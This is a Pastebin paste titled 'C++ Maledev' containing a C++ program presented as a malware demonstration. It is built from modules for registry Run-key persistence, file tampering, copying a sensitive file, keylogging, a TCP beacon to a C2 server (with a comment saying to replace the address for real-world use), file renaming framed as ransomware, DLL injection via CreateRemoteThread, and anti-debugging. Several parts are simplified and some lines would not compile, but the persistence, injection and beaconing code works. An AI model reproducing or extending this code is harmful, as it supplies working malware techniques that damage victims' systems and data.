API tools faq
paste
Advertisement
Guest User

C++ Maledev

a guest
Dec 15th, 2024
460
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.17 KB | None | 0 0
raw download clone embed print report
  1. #include <iostream>
  2. #include <fstream>
  3. #include <string>
  4. #include <vector>
  5. #include <windows.h>
  6. #include <winreg.h>
  7. #include <direct.h>
  8. #include <filesystem>
  9. #include <chrono>
  10. #include <thread>
  11. #include <winsock2.h>
  12. #include <ws2tcpip.h>
  13. #include <Psapi.h>
  14. #include <TlHelp32.h>
  15. #include <Shlwapi.h>
  16. #include <Dbghelp.h>
  17.  
  18. #pragma comment(lib, "ws2_32.lib")
  19. #pragma comment(lib, "Psapi.lib")
  20. #pragma comment(lib, "Shlwapi.lib")
  21. #pragma comment(lib, "Dbghelp.lib")
  22.  
  23. namespace fs = std::filesystem;
  24.  
  25. // Module: Persistence
  26. class Persistence {
  27. public:
  28. static void establish() {
  29. HKEY hKey;
  30. std::wstring path = fs::current_path().wstring() + L"\\malware.exe";
  31. if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
  32. RegSetValueEx(hKey, L"Malware", 0, REG_SZ, (BYTE*)path.c_str(), (DWORD)(path.length() + 1) * sizeof(wchar_t));
  33. RegCloseKey(hKey);
  34. std::wcout << L"[+] Persistence established" << std::endl;
  35. } else {
  36. std::wcout << L"[!] Failed to establish persistence" << std::endl;
  37. }
  38. }
  39.  
  40. static void remove() {
  41. HKEY hKey;
  42. if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
  43. RegDeleteValue(hKey, L"Malware");
  44. RegCloseKey(hKey);
  45. std::wcout << L"[+] Removed persistence" << std::endl;
  46. }
  47. }
  48. };
  49.  
  50. // Module: File Infection
  51. class FileInfection {
  52. public:
  53. static void infect() {
  54. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
  55. if (entry.path().extension() == ".txt") {
  56. std::wofstream file(entry.path(), std::ios::app);
  57. if (file.is_open()) {
  58. file << L"\n\n[Malicious payload: This file has been compromised]";
  59. file.close();
  60. std::wcout << L"[*] Infected file: " << entry.path().wstring() << std::endl;
  61. }
  62. }
  63. }
  64. }
  65. };
  66.  
  67. // Module: Data Exfiltration
  68. class DataExfiltration {
  69. public:
  70. static void exfiltrate(const fs::path& source, const fs::path& destination) {
  71. if (fs::exists(source)) {
  72. fs::copy_file(source, destination, fs::copy_options::overwrite_existing);
  73. std::wcout << L"[+] Sensitive data exfiltrated to: " << destination.wstring() << std::endl;
  74. } else {
  75. std::wcout << L"[!] File for data exfiltration not found" << std::endl;
  76. }
  77. }
  78. };
  79.  
  80. // Module: Keylogger
  81. class Keylogger {
  82. private:
  83. std::wofstream logFile;
  84.  
  85. public:
  86. Keylogger() {
  87. logFile.open("keylog.txt", std::ios::app);
  88. }
  89.  
  90. ~Keylogger() {
  91. if (logFile.is_open()) logFile.close();
  92. }
  93.  
  94. void start() {
  95. if (logFile.is_open()) {
  96. std::wcout << L"[+] Starting keylogger" << std::endl;
  97. for(int i = 0; i < 100; ++i) { // Log 100 keystrokes for demo
  98. if (_kbhit()) {
  99. wchar_t key = _getwch();
  100. if (key >= L'a' && key <= L'z') key = key - 32; // Convert to uppercase
  101. logFile << key;
  102. }
  103. std::this_thread::sleep_for(std::chrono::milliseconds(100));
  104. }
  105. std::wcout << L"[+] Keylogger stopped" << std::endl;
  106. } else {
  107. std::wcout << L"[!] Failed to start keylogger" << std::endl;
  108. }
  109. }
  110. };
  111.  
  112. // Module: C2 Communication
  113. class C2Communication {
  114. public:
  115. static void communicate(const std::string& ipAddress, int port) {
  116. WSADATA wsaData;
  117. SOCKET ConnectSocket = INVALID_SOCKET;
  118. struct sockaddr_in clientService;
  119.  
  120. if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
  121. std::wcout << L"[!] Failed to initialize Winsock" << std::endl;
  122. return;
  123. }
  124.  
  125. ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  126. if (ConnectSocket == INVALID_SOCKET) {
  127. std::wcout << L"[!] Error at socket()" << std::endl;
  128. WSACleanup();
  129. return;
  130. }
  131.  
  132. clientService.sin_family = AF_INET;
  133. clientService.sin_addr.s_addr = inet_addr(ipAddress.c_str());
  134. clientService.sin_port = htons(port);
  135.  
  136. if (connect(ConnectSocket, (SOCKADDR*)&clientService, sizeof(clientService)) == SOCKET_ERROR) {
  137. std::wcout << L"[!] Failed to connect to C2 server" << std::endl;
  138. closesocket(ConnectSocket);
  139. WSACleanup();
  140. return;
  141. }
  142.  
  143. const char* message = "Malware beacon";
  144. send(ConnectSocket, message, strlen(message), 0);
  145. std::wcout << L"[+] Beacon sent to C2 server" << std::endl;
  146.  
  147. closesocket(ConnectSocket);
  148. WSACleanup();
  149. }
  150. };
  151.  
  152. // Module: Ransomware Simulation
  153. class Ransomware {
  154. public:
  155. static void encryptFiles() {
  156. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
  157. std::wstring ext = entry.path().wstring().extension();
  158. if (ext == L".docx" || ext == L".pdf" || ext == L".txt") {
  159. fs::path encryptedPath = entry.path().wstring() + L".encrypted";
  160. fs::rename(entry.path(), encryptedPath);
  161. std::wcout << L"[*] File encrypted: " << entry.path().wstring() << L" -> " << encryptedPath.wstring() << std::endl;
  162. }
  163. }
  164. }
  165.  
  166. static void decryptFiles() {
  167. for (const auto & entry : fs::directory_iterator(fs::current_path())) {
  168. if (entry.path().extension() == ".encrypted") {
  169. fs::path originalPath = entry.path().wstring().substr(0, entry.path().wstring().length() - 10); // remove .encrypted
  170. fs::rename(entry.path(), originalPath);
  171. std::wcout << L"[*] File decrypted for demo: " << entry.path().wstring() << std::endl;
  172. }
  173. }
  174. }
  175. };
  176.  
  177. // Module: Process Injection
  178. class ProcessInjection {
  179. public:
  180. static void inject(const char* targetProcessName, const char* dllPath) {
  181. HANDLE hProcess = NULL, hThread = NULL;
  182. HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
  183. LPVOID pLoadLibrary = (LPVOID)GetProcAddress(hKernel32, "LoadLibraryA");
  184.  
  185. PROCESSENTRY32 pe32;
  186. pe32.dwSize = sizeof(PROCESSENTRY32);
  187.  
  188. HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  189. if (hSnapshot == INVALID_HANDLE_VALUE) return;
  190.  
  191. if (Process32First(hSnapshot, &pe32)) {
  192. do {
  193. if (strcmp(pe32.szExeFile, targetProcessName) == 0) {
  194. hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
  195. if (hProcess) {
  196. LPVOID pRemoteString = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
  197. if (pRemoteString) {
  198. WriteProcessMemory(hProcess, pRemoteString, (LPVOID)dllPath, strlen(dllPath) + 1, NULL);
  199.  
  200. hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteString, 0, NULL);
  201. if (hThread) {
  202. WaitForSingleObject(hThread, INFINITE);
  203. VirtualFreeEx(hProcess, pRemoteString, 0, MEM_RELEASE);
  204. }
  205. }
  206. CloseHandle(hProcess);
  207. }
  208. break;
  209. }
  210. } while (Process32Next(hSnapshot, &pe32));
  211. }
  212. CloseHandle(hSnapshot);
  213. if (hThread) CloseHandle(hThread);
  214. std::wcout << L"[+] DLL injected into " << targetProcessName << std::endl;
  215. }
  216. };
  217.  
  218. // Module: Anti-Debugging
  219. class AntiDebugging {
  220. public:
  221. static bool isDebuggerPresent() {
  222. return IsDebuggerPresent();
  223. }
  224.  
  225. static void checkForDebuggers() {
  226. if (isDebuggerPresent()) {
  227. std::wcout << L"[!] Debugger detected, exiting..." << std::endl;
  228. exit(1);
  229. }
  230. }
  231.  
  232. static void antiDebuggingLoop() {
  233. while (true) {
  234. checkForDebuggers();
  235. Sleep(1000); // Check every second
  236. }
  237. }
  238. };
  239.  
  240. // Module: Privilege Escalation Check
  241. class PrivilegeEscalation {
  242. public:
  243. static bool isAdmin() {
  244. BOOL isAdmin = FALSE;
  245. PSID AdministratorsGroup;
  246. SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
  247. if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup)) {
  248. CheckTokenMembership(NULL, AdministratorsGroup, &isAdmin);
  249. FreeSid(AdministratorsGroup);
  250. }
  251. return isAdmin;
  252. }
  253. };
  254.  
  255. int main() {
  256. std::wcout << L"[!] Running Malware Demonstration" << std::endl;
  257.  
  258. // Check for admin rights
  259. if (PrivilegeEscalation::isAdmin()) {
  260. std::wcout << L"[+] Running with admin rights" << std::endl;
  261. } else {
  262. std::wcout << L"[+] Running without admin rights" << std::endl;
  263. }
  264.  
  265. // Anti-Debugging
  266. std::thread antiDebugThread(AntiDebugging::antiDebuggingLoop);
  267. antiDebugThread.detach();
  268.  
  269. // Persistence
  270. Persistence::establish();
  271.  
  272. // File Infection
  273. FileInfection::infect();
  274.  
  275. // Data Exfiltration
  276. DataExfiltration::exfiltrate("sensitive_data.txt", "C:\\temp\\stolen_data.txt");
  277.  
  278. // Keylogger
  279. Keylogger keylogger;
  280. keylogger.start();
  281.  
  282. // C2 Communication
  283. C2Communication::communicate("127.0.0.1", 4444); // Replace with actual C2 server for real-world use
  284.  
  285. // Ransomware
  286. Ransomware::encryptFiles();
  287.  
  288. // Process Injection (Demo with notepad, replace with actual process name in real scenarios)
  289. ProcessInjection::inject("notepad.exe", "C:\\path\\to\\your\\dll.dll"); // Path to a DLL for demonstration
  290.  
  291. // Clean up
  292. Persistence::remove();
  293. Ransomware::decryptFiles();
  294. fs::remove(L"C:\\temp\\stolen_data.txt");
  295. std::wcout << L"[+] Cleaned up operations" << std::endl;
  296.  
  297. return 0;
  298. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!